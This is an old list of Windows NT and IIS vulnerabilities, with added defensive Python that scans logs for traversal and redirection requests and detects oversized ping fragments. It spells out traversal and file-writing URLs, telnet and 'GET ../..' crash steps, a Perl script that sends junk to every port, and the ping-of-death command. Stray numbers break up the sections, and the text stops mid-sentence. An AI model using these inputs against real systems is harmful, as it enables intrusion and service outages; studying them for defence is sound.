NT vulnerabilities and descriptions (English)

Affected systems: 4.0, IIS 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------

Affected systems: 4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.

If the file 'target.bat' exists, the file will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.
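A defender-side check for the two request shapes above (the '..\..' traversal and the '>' / %0A%0D redirection into a script name), as an added example that is not part of the original list: it percent-decodes each request path from a few constructed IIS-style log lines, normalizes backslashes to slashes, and reports any request that carries a dot-dot segment, climbs above the content root, or contains shell redirection or CR/LF bytes. The log lines and the function names are constructed for the illustration.

```python
import re
from urllib.parse import unquote

# Constructed IIS-style log lines (method, request path, status) for the demo; not real traffic.
SAMPLE_LOG = [
    'GET /index.htm 200',
    'GET /..\\.. 200',
    'GET /scripts..\\..\\winnt\\system32\\cmd.exe 200',
    'GET /scripts/exploit.bat>c:\\inetpub\\target.bat 200',
    'GET /scripts/script_name%0A%0D>c:\\inetpub\\target.bat 200',
    'GET /images/%2e%2e/%2e%2e/boot.ini 404',
    'GET /docs/a..b/readme.txt 200',
]


def normalize(path):
    """Percent-decode once and map backslashes to slashes so '..\\..' and
    '%2e%2e%5c' both collapse to the same '../' shape before inspection."""
    return unquote(path).replace('\\', '/')


def escapes_root(path):
    """Walk the decoded path segment by segment and report whether a '..'
    ever climbs above the content root (directory depth goes negative)."""
    depth = 0
    for seg in normalize(path).split('/'):
        if seg == '..':
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != '.':
            depth += 1
    return False


def findings(path):
    """List of reasons this request path should be rejected (empty if clean)."""
    norm = normalize(path)
    reasons = []
    if '..' in norm.split('/'):
        # any bare dot-dot segment; legitimate content URLs never need one
        reasons.append('dot-dot segment')
    if escapes_root(path):
        reasons.append('escapes content root')
    if re.search(r'[<>|]', norm):
        # '>' is what turns scripts/name>target into a file write on the server
        reasons.append('shell redirection metacharacter')
    if '\r' in norm or '\n' in norm:
        # %0A%0D decodes to LF/CR, which ends the command line early
        reasons.append('embedded CR/LF')
    return reasons


def scan_log(lines):
    """Return (line, reasons) for every log line whose request path is suspicious."""
    hits = []
    for line in lines:
        parts = line.split(' ')
        if len(parts) < 2:
            continue
        reasons = findings(parts[1])
        if reasons:
            hits.append((line, reasons))
    return hits


if __name__ == '__main__':
    for line, reasons in scan_log(SAMPLE_LOG):
        print(f'{line!r}: {", ".join(reasons)}')
```

Running scan_log on the sample lines flags the five requests that mirror the entries above and leaves the two ordinary ones alone. At the server the same checks belong before the path is mapped to disk, where the request should be rejected rather than served; and, as the Guest/IUSR_WWW note above implies, the account the web server runs as should not hold read access to the whole disk in the first place.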

----------------------------------------------------------------------

Affected systems: 3.51, 4.0
Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:

Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a carriage return (<cr>)
Exit Telnet

result in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe), where the IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
10
The following is a modified Perl script gleaned from postings in the [email protected] list to test ports on your system (Perl is available from the NT Resource Kit):

/*begin poke code*/

use Socket;
use FileHandle;
require "chat2.pl";   # old chat library shipped with the Resource Kit Perl; provides chat::open_port etc.

# target host name from the command line
$systemname = shift @ARGV or die "usage: perl poke servername\n";

$verbose = 1;    # tell me what you're hitting
$knownports = 1; # don't hit known problem ports
for ($port = 0; $port < 65535; $port++)
{
    # skip the ports already known to lock up services (53, 135, 1031)
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    $fh = chat::open_port($systemname, $port);
    next unless $fh;   # open_port returns undef when nothing answers on $port
    chat::print($fh, "This is about ten characters or more");
    if ($verbose) {
        print "Trying port: $port\n";
    }
    chat::close($fh);
}

/*end poke code*/
41
Save the above text as c:\perl\bin\poke and run it like this: C:\perl\bin> perl poke servername
43
--------------------------------------------------------------------------------
45
Affected systems: 4.0
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." followed by a carriage return, will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
52
--------------------------------------------------------------------------------
54
Affected systems: 3.51, 4.0
Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as the 'Ping of Death', can cause a blue screen of death on 3.51 systems:

STOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable when sending large packets, but does not crash on receiving large packets.
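The crash above is triggered by an ICMP echo whose fragments reassemble to more than an IPv4 datagram can legally hold. The following added Python (not from the original page) reproduces that arithmetic from the receiver's side: it models how a sender fragments the echo at an Ethernet MTU, then checks whether the last fragment's offset plus length exceeds the 65515 payload bytes a 65535-byte datagram can carry, which is the test a reassembly layer or firewall applies to drop such packets before reassembly. The fragment tuples and the function names are constructed for the illustration.

```python
IP_HEADER_LEN = 20                                # minimal IPv4 header, no options
MAX_IP_DATAGRAM = 65535                           # 16-bit Total Length field
MAX_IP_PAYLOAD = MAX_IP_DATAGRAM - IP_HEADER_LEN  # 65515: most payload a legal datagram can carry
ICMP_HEADER_LEN = 8                               # type, code, checksum, id, sequence


def ping_payload(data_len):
    """IP payload size of an ICMP echo request carrying data_len data bytes (ping -l data_len)."""
    return ICMP_HEADER_LEN + data_len


def fragment(payload_len, mtu=1500):
    """Model how a sender splits an IP payload of payload_len bytes at the given MTU.
    Returns (offset_bytes, more_fragments, length) tuples; offsets are multiples of 8
    because the IP fragment-offset field counts 8-byte units. Constructed for the demo."""
    per_fragment = (mtu - IP_HEADER_LEN) // 8 * 8   # 1480 bytes on Ethernet
    frags = []
    offset = 0
    while offset < payload_len:
        length = min(per_fragment, payload_len - offset)
        more = offset + length < payload_len
        frags.append((offset, more, length))
        offset += length
    return frags


def reassembled_payload_length(frags):
    """Byte position just past the last fragment, i.e. the reassembled payload size."""
    return max(off + ln for off, _, ln in frags)


def is_oversized(frags):
    """True when the fragments would reassemble to more payload than any IPv4
    datagram can hold. A receiver that trusts the offsets instead of checking
    this overruns its reassembly buffer, which is what the TCPIP.SYS faults above reflect."""
    return reassembled_payload_length(frags) > MAX_IP_PAYLOAD


if __name__ == '__main__':
    # 65507 is the largest data size that still fits a legal datagram; 65527 is the value from the entry above
    for data_len in (65507, 65527):
        frags = fragment(ping_payload(data_len))
        print(f'ping -l {data_len}: {len(frags)} fragments, '
              f'reassembles to {reassembled_payload_length(frags)} bytes, '
              f'oversized={is_oversized(frags)}')
```

With -l 65527 the echo carries 65535 bytes of IP payload, 20 bytes more than the maximum, so is_oversized reports True; at -l 65507 it lands exactly on the limit and passes. The decision can be made on the final fragment alone (its offset plus its length), so a filter does not need to buffer the whole datagram to reject it.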
67
--------------------------------------------------------------------------------
69
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have two kinds of results. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access